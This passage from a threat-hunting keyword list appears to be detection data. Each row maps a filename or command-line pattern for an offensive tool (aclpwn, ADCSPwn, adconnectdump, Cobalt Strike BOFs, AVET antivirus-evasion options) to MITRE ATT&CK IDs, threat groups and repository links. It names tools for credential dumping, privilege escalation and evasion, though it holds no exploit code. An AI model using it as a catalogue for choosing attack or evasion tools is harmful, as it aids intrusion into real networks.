+"*ACLight2.psm1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight-master*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*aclpwn -f * -ft computer -t * -tt domain -d * -dry*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*aclpwn.py*","offensive_tool_keyword","Aclpwn","Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. 
Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn","T1098 - T1208 - T1550 - T1484 - T1486","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/aclpwn.py","1","0","N/A","N/A","7","647","104","2021-11-18T03:47:24Z","2018-12-04T18:45:04Z" +"*ACLScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*acltoolkit *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*acltoolkit.git*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*acltoolkit-ad*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*acltoolkit-main*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*acronis_trueimage_xpc_privesc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*AcroRd32.exe FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*Action: Locating SCCM Management Servers*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*Action: Locating SCCM Servers in Registry*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*action=SchTaskCOMHijack *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*activedirectory/pwns.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*activeScan++.py*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. 
it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","7","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*AD Privesc Automation*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*ad_dns_dump.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*AD_Enumeration_Hunt.ps1*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" +"*AD_Enumeration_Hunt-alperen_ugurlu_hack*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD 
Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" +"*ADACLScan.ps1*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*ADACLScanner*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*ADACLScanner-master*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*adalanche analyze*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*adalanche collect*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" 
+"*adalanche-*.exe*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*Adalanche.git*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*adalanche-collector*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*ADCollector.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*adconnectdump.py*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*adconnectdump-master*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*adcs_enum.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*adcs_enum_com.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*adcs_enum_com2.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*adcsattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*adcskiller.py*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*ADCSPwn.csproj*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*ADCSPwn.exe*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*ADCSPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADCSPwn.sln*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*ADCSPwn-master*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*add_evasion check_fast_forwarding*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion computation_fibonacci *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion computation_timed_fibonacci*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion evasion_by_sleep *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion fopen_sandbox_evasion*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_bios_info*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_computer_domain *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_cpu_cores *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_install_date *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_num_processes*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_standard_browser *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion get_tickcount*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion gethostbyname_sandbox_evasion*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_background_wp*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_folder *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_network_drive*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_public_desktop*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_recent_files*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*add_evasion has_recycle_bin*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
